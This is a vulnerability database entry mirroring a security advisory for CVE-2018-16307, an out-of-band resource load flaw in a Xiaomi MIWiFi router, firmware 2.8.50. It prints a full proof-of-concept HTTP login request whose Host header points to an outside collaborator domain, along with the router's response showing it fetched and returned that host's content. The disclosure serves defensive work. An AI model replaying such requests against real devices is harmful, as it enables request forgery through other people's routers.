Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMishra DhirajPACKETSTORM:149196
HistorySep 02, 2018 - 12:00 a.m.

MIWiFi Xiaomi_55DD 2.8.50 Out-Of-Band Resource Load

2018-09-0200:00:00
Mishra Dhiraj
packetstormsecurity.com
76

0.006 Low

EPSS

Percentile

77.7%

JSON
`CVE: CVE-2018-16307  
Issue: Out-of-band resource load  
Product affected: MIWiFi Xiaomi_55DD Version 2.8.50  
  
Summary:  
An "Out-of-band resource load" issue was discovered on Xiaomi MIWiFi Xiaomi_55DD Version 2.8.50 devices. It is possible to induce the application to retrieve the contents of an arbitrary external URL and return those contents in its own response. If a domain name (containing a random string) is used in the HTTP Host header, the application performs an HTTP request to the specified domain. The response from that request is then included in the application's own response.  
  
## Request  
  
POST /cgi-bin/luci/api/xqsystem/login HTTP/1.1  
Host: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0  
Accept: */*  
Accept-Language: en-GB,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.31.1/cgi-bin/luci/web/home  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 126  
Cookie: __guid=86847064.3826147368769525000.1535781606575.13; monitor_count=9; psp=admin|||2|||0  
Connection: close  
  
username=admin&password=b2e8d6e552db587f3c283ce59c4d08fcbaf2cc9e&logtype=2&nonce=0_4c%3Abb%3A58%3A47%3A39%3A84_1535785091_2732  
  
## Response  
  
HTTP/1.1 200 OK  
Content-Type: text/html  
Content-Length: 62  
Connection: close  
Server: Burp Collaborator https://burpcollaborator.net/  
X-Collaborator-Version: 4  
Expires: Thu, 01 Jan 1970 00:00:01 GMT  
Cache-Control: no-cache  
MiCGI-Switch: 1 0  
MiCGI-TproxyInfo: 192.168.31.1:80  
MiCGI-Upstream: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net  
MiCGI-Client-Ip: 192.168.31.237  
MiCGI-Host: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net  
MiCGI-Http-Host: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net  
MiCGI-Server-Ip: 192.168.31.1  
MiCGI-Server-Port: 80  
MiCGI-Status: AUTOPROXY  
MiCGI-Preload: no  
  
<html><body>x4e809xt6zpgky5b16f6dezjlglgkugifigz</body></html>  
  
`

Related

prion 1
cvelist 1
nvd 1
zdt 1
cve 1
prion
prion
Design/Logic Flaw
2018-09-05 21:29:00
cvelist
cvelist
CVE-2018-16307
2018-09-05 21:00:00
nvd
nvd
CVE-2018-16307
2018-09-05 21:29:03
zdt
zdt
Xiaomi MIWiFi Xiaomi_55DD 2.8.50 Out-Of-Band Resource Load Vulnerability
2018-09-03 00:00:00
cve
cve
CVE-2018-16307
2018-09-05 21:29:03

0.006 Low

EPSS

Percentile

77.7%

JSON
Related for PACKETSTORM:149196
prion1cvelist1nvd1zdt1cve1